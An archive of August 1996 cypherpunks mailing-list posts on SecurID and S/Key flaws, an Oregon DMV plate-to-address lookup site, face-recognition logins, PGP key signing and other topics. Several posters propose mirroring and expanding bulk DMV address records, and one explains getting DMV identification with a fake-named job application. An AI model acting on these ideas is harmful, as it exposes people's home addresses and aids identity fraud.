>like.

According to Mudge (who gave the talk), he *was* going to speak specifically
on SecurID, but they were harassing him or something, and was afraid of a
libel suit if he spoke on it.  Instead, he chose to speak on S/Key flaws,
many of which are the same as SecurID flaws.  All of the attacks were on
the stupidity of the implementations and protocols, not on the cryptographic
algorithms.   Some stuff can be found at http://www.l0pht.com/~mudge .
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 02:51:11 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608081508.IAA11479@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 8/7/96 -0700, Timothy C. May wrote:
>
>Cypherpunks make the news again.
>
>I'm watching the LA NBC news channel, and they report that the Oregon "look
>up any license plate" Web site is causing a flap. Though apparently legal,
>the critics admit, the Governor wants the material removed.
>
>(Sounds like a good time to mirror it on some other sites, pronto!)
>
>--Tim May

No rush, Tim.  I've got the whole thing on CDROM.  In fact, the person who 
put the thing on the net got the data from me...through a friend.  I bought 
it from a person who's been selling CDROM's of this data for a couple of 
years.  The most recent revision (and the one that's on the 'net) is about 4 
months old.  

So far, what's been put on the net is merely the "license plate # to 
address" lookup.  We also have the "name to address" data...


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 9 Aug 1996 03:16:58 +0800
To: tcmay@got.net>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <199608081523.IAA15512@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Not all states (Washington and California, for example) will sell their DMV
lists.

There is a gentleman that goes by the handle of Bootleg, that does sell
CD-ROM versions of said listings (my guess where the Web site got the data
from).  Last heard, he had Oregon, Texas, and Florida.  Oregon was the
bargain around $220, Florida and Texas were about $500.

Try 503-325-0861 for voice (don't know if that's still current).  He may be
on the Net, but I don't have an address.

Joel

At 05:57 AM 8/8/96 -0700, Declan McCullagh wrote:
>Looks like we're a little late. However, we can still grab the tape from 
>Oregon's DMV for $220. It would be an interesting excercise to try to get 
>these tapes from each state with similar provisions and put them all 
>online.
>
>Anyone want to donate server space?
>
>-Declan
>
>
>http://www.spiritone.com/cgi-bin/plates
>
>   Service has been temporarily suspended.
>   Don't panic, I just want to think about the situation for a while.    
>   Stay tuned. --Aaron
>
>---
>
>   There is a very real chance that it will be turned off. That's becuase
>   all of the people who hate it call the TV and Radio stations, the DMV,
>   and their elected representitives. All of the people who love it send
>   me email. As much as I appreciate hearing from all of you, sending me
>   email doesn't let anyone else know how you feel. If you want to keep
>   this service going, make your voices heard.
>
>
>
>On Wed, 7 Aug 1996, Timothy C. May wrote:
>
>> 
>> Cypherpunks make the news again.
>> 
>> I'm watching the LA NBC news channel, and they report that the Oregon "look
>> up any license plate" Web site is causing a flap. Though apparently legal,
>> the critics admit, the Governor wants the material removed.
>> 
>> (Sounds like a good time to mirror it on some other sites, pronto!)
>> 
>> --Tim May
>> 
>> Boycott "Big Brother Inside" software!
>> We got computers, we're tapping phone lines, we know that that ain't allowed.
>> ---------:---------:---------:---------:---------:---------:---------:----
>> Timothy C. May              | Crypto Anarchy: encryption, digital money,
>> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>> Licensed Ontologist         | black markets, collapse of governments.
>> "National borders aren't even speed bumps on the information superhighway."
>> 
>> 
>> 
>> 
>
>
>// declan@eff.org // I do not represent the EFF // declan@well.com //
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 8 Aug 1996 15:11:47 +0800
To: "Robert A. Rosenberg" <stewarts@ix.netcom.com>
Subject: Re: FAA to require transponders on all aircraft passengers
Message-ID: <1.5.4.32.19960808023248.002efc00@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 00:49 06/08/96 -0500, Robert A. Rosenberg wrote:

>They better hold off loading the containers with the luggage until they
>lock down/up the plane so they can verify who got on (and can pull any
>unaccompanied luggage). It is either that or unloading the plane if there
>is a missing passenger.

Many airports (e.g. Zurich) require you to identify your baggage on the way
to the plane. If somebody merely keeps watch to ensure that you don't run 
away after identifying your baggage, the system works. There are problems 
that can be solved without computers :-)

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 9 Aug 1996 05:12:44 +0800
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: ****CyberWatch Security With Face Recognition 08/07/96
In-Reply-To: <9608081407.AA01011@rpcp.mit.edu>
Message-ID: <Pine.SUN.3.91.960808083741.14499I-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 8 Aug 1996, Joseph M. Reagle Jr. wrote:

> TrueFace CyberWatch uses Miros' software and a small video
> camera on top of the computer monitor to verify computer users
> when they try to access protected data. TrueFace "snaps" a
> picture of the current computer operator and compares it to
> images in a database of authorized users. Continued spot checks
> are taken to ensure the same user is at the computer...and
> cannot be fooled by holding up a photo of a person. 
 
How about substituting a video tape of an authorized user for 
the camera input?  (Hey, it worked on the old Mission Impossible
show and a whole slew of movies.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Fri, 9 Aug 1996 05:58:59 +0800
To: tcmay@got.net>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960808154452.00c70514@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Have bandwidth, will travel.

Server space available here. www.vertexgroup.com/dmv/ is good to go.
Database front ends a speciality.






At 05:57 AM 8/8/96 -0700, Declan McCullagh wrote:
>Looks like we're a little late. However, we can still grab the tape from 
>Oregon's DMV for $220. It would be an interesting excercise to try to get 
>these tapes from each state with similar provisions and put them all 
>online.
>
>Anyone want to donate server space?
>
>-Declan
>
>
>http://www.spiritone.com/cgi-bin/plates
>
>   Service has been temporarily suspended.
>   Don't panic, I just want to think about the situation for a while.    
>   Stay tuned. --Aaron
>
>---
>
>   There is a very real chance that it will be turned off. That's becuase
>   all of the people who hate it call the TV and Radio stations, the DMV,
>   and their elected representitives. All of the people who love it send
>   me email. As much as I appreciate hearing from all of you, sending me
>   email doesn't let anyone else know how you feel. If you want to keep
>   this service going, make your voices heard.
>
>
>
>On Wed, 7 Aug 1996, Timothy C. May wrote:
>
>> 
>> Cypherpunks make the news again.
>> 
>> I'm watching the LA NBC news channel, and they report that the Oregon "look
>> up any license plate" Web site is causing a flap. Though apparently legal,
>> the critics admit, the Governor wants the material removed.
>> 
>> (Sounds like a good time to mirror it on some other sites, pronto!)
>> 
>> --Tim May
>> 
>> Boycott "Big Brother Inside" software!
>> We got computers, we're tapping phone lines, we know that that ain't allowed.
>> ---------:---------:---------:---------:---------:---------:---------:----
>> Timothy C. May              | Crypto Anarchy: encryption, digital money,
>> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>> Licensed Ontologist         | black markets, collapse of governments.
>> "National borders aren't even speed bumps on the information superhighway."
>> 
>> 
>> 
>> 
>
>
>// declan@eff.org // I do not represent the EFF // declan@well.com //
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 9 Aug 1996 03:30:16 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <3209A1D4.7566@netscape.com>
Message-ID: <v03007802ae2fbc0d6cdf@[17.219.102.169]>
MIME-Version: 1.0
Content-Type: text/plain


> Dr.Dimitri Vulis KOTM wrote:
>Scenario 3: Writing a comm program that lets Macs talk to each other with
>no consideration that some Mac users may wish to talk to other platform
>(or any other Mac-only software) is a major waste of time.
>
>Of course, Apple is pushing #3. They're worse than Microsoft.
>

Actually, we're not "pushing" this, we shipped it last year. It's available
for all Macintosh (that have enough memory) computers in System 7.5.3
at no additional cost.

For cypherpunks, it has two limitations:

-- It requires a mutually-trusted nameserver.
-- It is limited to 40-bit encryption to comply with ITAR.
-- A version that does not encrypt the data channel is provided
   for countries with crypto import restrictions.

On the other hand, it preserves authentication and is protected
against replay attacks. The API's are published (and we provide
sample code), so "any" Mac application can use the protocols to
talk to "any" other application.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu>
Date: Fri, 9 Aug 1996 01:20:45 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <v03007803ae2e770bd71e@[204.179.128.38]>
Message-ID: <v03007800ae2fa2da571a@[202.1.1.5]>
MIME-Version: 1.0
Content-Type: text/plain


>Apple computer is dead, for all intents and purposes. It will be "officially"
>dead (bankrupt) within a couple of years. Writing any sort of software for the
>Mac - crypto or otherwise - is a waste of time.

Considering the fact that exactly this sort of advice has been offerred and
has been wrong for over a decade, why should this oracular statement be any
more accurate? Note that there is excellent crypto software available for
the Mac (CryptDisk, PGPFone, and MacPGP for example). Vinnie's effort is a
welcome attempt to arrange the "plumbing" so that crypto software is even
more accessible on the most accessible OS. Sniping from the cheap seats is
the last thing he should have to endure.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 8 Aug 1996 18:46:23 +0800
To: cypherpunks@toad.com
Subject: CryptoCD
Message-ID: <32099C37.4A15@rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


If your interested in the upcoming CryptoCD, check out:
http://www.rpini.com/crypto/cryptocd.html
If you'll get one, once it's finished, mail to:
mailto:cryptocd@rpini.com
<hr>
see you,
remo pini




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Fri, 9 Aug 1996 09:41:55 +0800
To: cypherpunks@toad.com
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <Pine.SUN.3.91.960808055257.29528C-100000@eff.org>
Message-ID: <Pine.SUN.3.92.960808094648.21717A-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, Declan McCullagh wrote:

> Looks like we're a little late. However, we can still grab the tape from
> Oregon's DMV for $220. It would be an interesting excercise to try to get
> these tapes from each state with similar provisions and put them all
> online.

This information has been available in Oregon for at least a couple of
years on CD.  I've always been concerned about the privacy implications of
that service -- perhaps that's the upside of this story?  That people do
give a rat's ass about their privacy?

I do think that the information should be able to be disseminated on the
Net as long as it's legal.


Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 9 Aug 1996 05:01:41 +0800
To: cypherpunks@toad.com
Subject: Re: PGP public key servers are NOT useful!
In-Reply-To: <199608080452.AAA08047@comet.connix.com>
Message-ID: <199608081351.JAA14923@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Amnesia Anonymous Remailer writes:
> The web of trust just certifies that the key belongs to someone.  If
> you'd read to the end of the message, you would have seen that I was
> not complaining about the key certification process in PGP.  At issue is
> NOT whether a key can be trusted to belong to someone, but whether or
> not random people should be able to tag others' PGP keys with crap.

You still don't get it, do you?

It doesn't matter what random idiots tag onto your key so long as
there is no trust path between the user of the key and the idiot who
tagged stuff on. If someone signs "grand wizard of the KKK" onto your
key, what do you care if no one trusts the signator who attached the
crap?

> What I want to prevent is some person I dislike uploading his
> signature on my key (particularly if he adds another ID to my key and
> signs that).

Why do you care?

> How would you like it if I added a new ID to your key containing sort
> of insult, certified that ID, and uploaded the new signature to the
> key servers.

I wouldn't give a flying rat's buttocks, because unless the signatures
are widely trusted the information is noise.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Fri, 9 Aug 1996 04:33:48 +0800
To: cypherpunks@toad.com
Subject: Re: appropriate algorithm for application
In-Reply-To: <3208DD65.237C228A@systemics.com>
Message-ID: <ML-2.2.839513101.7349.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


> Cerridwyn Llewyellyn wrote:
> > 
> > I need an algorithm/protocol that is capable of encrypting numerous
> > files with separate keys, but there also needs to be a master key
> > that will be able to decrypt all of them.  Is there such a system
> > that is relatively secure?  I'd prefer the system to be as secure
> > as possible, but in this application, security is secondary to
> > functionality.  Thanks... //cerridwyn//
> 
> Are you after a working program, or just a design?
> 
> You could always use an escrowed public key generator (discussed on
> sci.crypt some time ago), where the keys all have a factor of 'N'
> embedded in 'N', but encrypted with the master key.
> 
> (I'd be prepared to write the code that generates the keys, if
> someone does the "master decrypt" side of things).
> 
> Gary
> --
> pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
> Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
> ^S
> ^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T
> 
> 

Why not just encrypt the files with regular, single key encryption and only use
the public-key encryption on a master file holding a copy of all the individual
keys?  This would be faster right?

Scott





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Fri, 9 Aug 1996 01:03:43 +0800
To: cypherpunks@toad.com
Subject: ****CyberWatch Security With Face Recognition 08/07/96
Message-ID: <9608081407.AA01011@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
WELLESLEY, MASSACHUSETTS, U.S.A., 1996 AUG 7 (NB) -- By Bob Woods.  
A person's face may become much more valuable than providing good 
looks to everyone who sees him or her. That's because Miros Inc. 
has developed a new software product that uses face recognition 
to access secured areas on a network. 

Miros' "TrueFace CyberWatch" is described as the first product of its  
kind that controls access to secured data by using facial lines. The 
technology is based on neural networks technology invented by Miros 
President Michael Kuperstein and the company's Dr. James Kottas, 
and developed at the Massachusetts Institute of Technology (MIT). 

Variability of people's faces is overcome in determining whether an  
actual face is the same or different than a face image that was 
previously stored. 

TrueFace CyberWatch uses Miros' software and a small video camera on  
top of the computer monitor to verify computer users when they 
try to access protected data. TrueFace "snaps" a picture of the current 
computer operator and compares it to images in a database of authorized 
users. Continued spot checks are taken to ensure the same user is 
at the computer. 

Some of the information that can be protected includes medical,  
financial, criminal, or military records, officials said. The system 
requires no training, is fast to use, and cannot be fooled by holding 
up a photo of a person. 

This technology has been used in other situations, including the  
securing of buildings or special areas, officials said. 

TrueFace CyberWatch is compatible with PC client/server standards and  
can be used alone or with other security programs, officials said. 

The client runs on Windows 95 and Windows NT operating systems, and  
costs $199. A bundle package, which includes a Connectix camera and 
the software, is priced at $298. Both products will be shipping 
within the next two months, officials said. 

(19960807/Press Contact: Christine Sheroff, Sheroff & Associates,  
508-435-3306) 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 8 Aug 1996 18:12:13 +0800
To: cypherpunks@toad.com
Subject: Scientists discover evidence of life on Macs!
Message-ID: <199608080807.KAA23561@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Okay, I'll stop.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMgmgKUjbHy8sKZitAQGH+AMAgUBwBqkZCbHw21xUwiarJe+Gzo+7yDqs
gvX0Tos+/YdMSjl2fMbV8480qvbTz+r6izqh8y6D4Fv0sbM12PCUq2AoeJo35naI
GWNV3yybBj2N0YsuOmvhQvcE/lDyVesF
=kx/N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 9 Aug 1996 12:07:13 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Internal Passports
In-Reply-To: <Pine.LNX.3.94.960808070101.346A-100000@switch.sp.org>
Message-ID: <Pine.LNX.3.93.960808101728.254H-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, The Deviant wrote:
> On Wed, 7 Aug 1996, Mark C. Henderson wrote:
> > I note that California requires some sort of documentation (birth 
> > cert, INS documentation etc.) for a new driver's licence. Don't know
> > about other states.  
> 
> Hrmm... North Carolina requires 2 forms of ID, which can be an older
> Driver's license, a SS card, a military ID, a birth certificate, or
> (you'll love this one)...   "A filled in job application"... It doesn't
> even have to be signed by the company, or any of that shit.  I can walk
> over to RatShack, ask for an application, fill it out as "J. E. Hoover",
> and its a valid form of ID at the DMV.

     You forgot "The Family Bible" at least that was in effect the last
time I was in N.C.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Fri, 9 Aug 1996 10:00:06 +0800
To: cypherpunks@toad.com
Subject: Re: PGP Mailer for the masses ?
Message-ID: <199608081721.KAA17992@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, provos@wserver.physnet.uni-hamburg.de
Date: Thu Aug 08 12:20:42 1996
> Hi!
> 
> Due to the possibility of governments prohibiting strong cryptography
> the idea to provide an easy to use mailer with addressbook
> and pgp functions arose on the german krypto mailinglist. The availabilty
> of an easy to use product would greatly enhance the use of cryptography
> on the internet and thus getting us nearer to the point of noreturn,
>  that
> is the point where a prohibtion of cryptography is not any longer
> possible.
> 

I can testify to the integration and effectiveness of Pronto Secure 
(Windows version), which I've changed over to from Eudora Pro. As near as I 
can tell, PGP interface is seamless. Don't know if that's what you're 
looking for.

Dave Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMglrIsVrTvyYOzAZAQEXIgP/eGi+VScrDU4laIc9HHRjBTGG09Et8yHb
tPpXzQrvNsmmLsKqDxstUYm8K5UrmBAO0yBARueVuees4wH8zd5gh42kDjbkWa7g
owR5ivjX6BEzAw4m07XlFSrhkCG+Or+/By0AM36y5G6gkgTcHBv8wj1pN+IZLPxY
INbU+SmIikA=
=RMrj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Fri, 9 Aug 1996 14:08:41 +0800
To: cypherpunks@toad.com
Subject: RE: STEGO GUNS
Message-ID: <199608081735.KAA03397@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathon <grafolog@netcom.com> wrote: 

>Said ordinance being passed, as a protest against Elk Grove, IL
>passing an orinance, banning handguns.  Anybody know when Elk
>Grove revoked their ordinance?  Crime went down for six months
>there [ Elk Grove ] after the ban was passed, then it went up
>far surpassing previous crime levels, for all types of crime. 

Pardon me Jonathon, but I believe you are confusing Morton Grove
with Elk Grove. I do not have the statistics for the crime rates
there, but several friends who have moved from there insist the
crime rate has continued upwards as you mentioned. Also there are
a couple of other interesting facts.

1) The city council exempted themselves from the handgun ban.

2) The wife of the Mayor reportedly purchased a handgun the day   
after the law was enacted.

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Fri, 9 Aug 1996 03:05:46 +0800
To: amehta@giasdl01.vsnl.net.in>
Subject: Re: A Global Village, or the future of porn on the net
Message-ID: <199608081530.LAA21406@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> At 10:00 24/07/96 +0000, Alex F wrote:

> Java classes for males and females corresponding to VRML
> objects. The class methods might include kissing, hugging,
> spanking, restraining...
> 
> A female object might be  initialized with Hillary Clinton's face, Evangelista's
> body... 

The thing is that most people who are into this stuff would probably 
view VRML graphics as too primitive to hold their interest for the 
sake of "stimulation."  I would suspect that the people who would end 
up getting involved in putting Hillary/Evangelista in, ummm, 
compromising positions would probably do it for the humor value (not 
that the censor mongers won't have a fit over this anyway).  When 
your CPU becomes the bottleneck in net connections and not the actual 
bandwidth, *then* some people might decide to spend the time 
rendering such things.  However, w/ the state of things today I have 
yet to see a totally realistic looking rendering.  You can usually 
tell a photo from a rendering.
 

> many pornographic stories on Usenet, it won't be long before
> famous personalities
> routinely get violated in cyberspace. Talk about copyright: do
> you have the right
> to prevent someone from doing this to you?
> 

I suppose slander would be some recourse, or you could copyright your 
likeness and use copyright violations as well.  Many TV/Movie stars 
do this.

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 9 Aug 1996 03:24:21 +0800
To: cypherpunks@toad.com
Subject: Re: Babble about universal service
In-Reply-To: <01I807LCWIHW9JD2RG@mbcl.rutgers.edu>
Message-ID: <v03007800ae2fb873cef2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


> I also wonder why universal service is such a Good Thing. It also,
> unfortunately, is on the agendas for the G-7-type meetings of information
> ministers from participating countries. http://www.eff.org/~declan/global/

My thinking on this is, fine. Let them do it. It'll be like a python trying
to eat a water buffalo. One which grows exponentially upon being eaten.

To paraphrase Kipling,

Kaa-blooie!

:-).

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 8 Aug 1996 18:56:54 +0800
To: cypherpunks@toad.com
Subject: Re: F2 hash?
In-Reply-To: <199608080339.WAA17283@homeport.org>
Message-ID: <Pine.GSO.3.93.960808112837.12351D-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 7 Aug 1996, Adam Shostack wrote:

> Jüri Kaljundi wrote:
> 
> | At Defcon this year they promised to tell about some security flaws in
> | SecurID tokens, anyone know more about that?
> 
> 	My understanding is that the guy who was going to give the
> talk had nda difficulties.  Vin?  Did you make it out?  The talk was
> going to be on race conditions, denial of service attacks, and the
> like.

This is something that seems to be a little problematic to me. Considering
the 3-minute time slot, it seems fairly easy to somehow block the SecurID
server at the time a user is sending his username/passcode, steal that
information and allow a malicious user to enter that information into the
server. Or have I misunderstood some security aspects?

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 9 Aug 1996 11:14:56 +0800
To: cypherpunks@toad.com
Subject: visual programming
Message-ID: <199608081912.MAA29522@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



"cpunks write code". the whole concept of writing code may 
fundamentally shift in the future to something that is far more
visually oriented. I tend to think so and think that this idea
will be particularly fruitfully explored relative to virtual 
reality. I believe that in the future, code will be written
neither with "code" nor with "writing", so to speak.

this is a blurb out of Xeroc Parc, the same organization that
brought you the revolutionary wysiwyg GUI, the mouse, the file/folder 
analogy, etc.

imagine that as a programmer, you could see an animated presentation
of your code operation at all times. it would be an incredible
development and debugging tool. it is quite a few years away, but
I think it is inevitable.

what is interesting is that visual programming is not necessarily
a replacement for computer languages. it could be seen as just
another layer of abstraction on top of source code, i.e. a means
of generating source code, which could be in any language du-jour
such as Java. in fact I think this is the way visual languages
will first make their way into commercial environments-- by meshing
with all the existing language baggage.


------- Forwarded Message

Newsgroups: ba.seminars,comp.human-factors,comp.cog-eng,comp.groupware
Subject: BayCHI (Aug 13) - Programming as a Video Game, plus Exploring the World of a Product
Date: 6 Aug 1996 01:23:33 GMT
Organization: Usability Adventures

                                  BayCHI,
                   the San Francisco Bay Area ACM SIGCHI
          (Special Interest Group on Computer-Human Interaction),
                        announces its August meeting:

                          Tuesday, August 13, 1996
                               7:30 - 9:30 pm


                         Programming as a Video Game
                                    or
               ToonTalk -- A Video Game for Creating Programs

                         Ken Kahn, Animated Programs

                                     +

   Exploring the World of a Product: the Light Switch Exploration Project
                     Sam Hecht, IDEO Product Development



                           Xerox PARC Auditorium
                           3333 Coyote Hill Road
                           Palo Alto, CA 94304

 
         <BayCHI meeting attendance is free & open to the public.>

                   <BayCHI programs are not videotaped,
                 and taping by attendees is not permitted.>


Abstract of "Programming as a Video Game or ToonTalk -- A Video Game for 
Creating Programs":

Seymour Papert once described the design of the Logo programming language
as
taking the best ideas in computer science about programming language
design
and "child engineering" them.  Twenty-five years after Logo's birth,
there has
been tremendous progress in programming language research and in
computer-human interfaces.  Programming languages exist now that are very
expressive and mathematically very elegant and yet are difficult to learn
and
master.  We believe the time is now ripe to attempt to repeat the success
of
the designers of Logo by child engineering one of these modern languages.

When Logo was first built, a critical aspect was taking the computational
constructs of the Lisp programming language and designing a child friendly
syntax for them.  Lisp's "CAR" was replaced by "FIRST", "DEFUN" by "TO",
parentheses were eliminated, and so on.  Today there are totally visual
languages in which programs exist as pictures and not as text.  We believe
this is a step in the right direction, but even better than visual
programs
are animated programs.  Animation is much better suited for dealing with
the
dynamics of computer programs than static icons or diagrams.  While there
has
been substantial progress in graphical user interfaces in the last
twenty-five
years, we chose to look not primarily at the desktop metaphor for ideas
but
instead at video games.  Video games are typically more direct, more
concrete,
and easier to learn than other software.  And more fun too.
 
We have constructed a general-purpose concurrent programming system,
ToonTalk
(TM), in which the source code is animated and the programming
environment is
a video game.  Every abstract computational aspect is mapped into a
concrete
metaphor.  For example, a computation is a city, an active object or
agent is
a house, birds carry messages between houses, a method or clause is a
robot
trained by the user and so on.  The programmer controls a "programmer
persona"
in this video world to construct, run, debug and modify programs.  We
believe
that ToonTalk is especially well suited for giving children the
opportunity to
build real programs in a manner that is easy to learn and fun to do.

A live demo of ToonTalk will be given.  (See http://www.toontalk.com.)

                                 ----- o -----

Abstract of "Exploring the World of a Product: the Light Switch
Exploration 
Project":

Initiated by IDEO industrial designers in San Francisco, the Light Switch 
exploration is the first in a series of projects which explore the world
of 
a product.  The benefits, other than those which are delivered within
each 
design, is to expand each designer's mind, but formulated within a group.
 
The group deliberately chose the humblest of product interfaces for 
exploration, asking that the test was in the using.  It was felt strongly 
that this type of project would be able to indirectly inspire some of the 
more complex products that IDEO usually works with, and which the layman 
eventually has to operate.  The approach taken was rooted heavily in both
a 
large vocabulary of materials and the appraisal of a light switch within
its 
environment.

The group started the project by examining the history and context of a
light 
switch and discovered that it was praticularly easy to move away from 
preconceptions which seem to have plagued many earlier attempts by
designers. 
This was further achieved by the group developing contextual platforms
for 
particular scenarios based on the relationships between object and light; 
control and light; the manipulation of light; and the interaction with a 
switch.  The root in material also inspired totally new ways of both 
manufacturing and operating a light switch.  It would be wrong to suggest
that 
these designs are anything more than concepts, but because they were
created 
within an environment that is populated by Human Factors, Engineering,
and 
Interaction Design, they hold many of the concerns which are evoked by
these 
professions.

The group extended the concept of "using" by creating working prototypes.
These were exhibited as part of the "Mutant Materials in Design"
exhibition 
at the Museum of Modern Art in New York.  Here, the public were able to 
interact with each switch in its proper context; that being to turn a
light 
bulb on and off.  New surprises were observed - such as people stroking a 
switch that only required the slightest of contact.  What was happening,
of 
course, was that relationships were being created between object and user.

The exploration was awarded the 1995 annual design award for concepts and
the 
CHI'96 video award for design, and was part of the International Design 
Yearbook for 1996.


Biographies:

ToonTalk was designed and built by KEN KAHN <kahn@csli.stanford.edu> who, 
after earning a doctorate in computer science from MIT, spent more than
15 
years as a researcher in programming languages, computer animation, and 
programming systems for children.  He has been a faculty member at MIT, 
University of Stockholm, and Uppsala University.  For over eight years he 
was a researcher at Xerox PARC.  During the 1970s he made several
animated 
films which were shown in film festivals, theaters, and cable TV.  In
1992, 
Ken founded Animated Programs whose mission is to make computer
programming 
child's play.  His patent application covering the underlying technology
of 
ToonTalk has recently been approved by the US Patent Office.  David,
Ken's 
11 year-old son, will be running the demos during the talk.

                                 ----- o -----

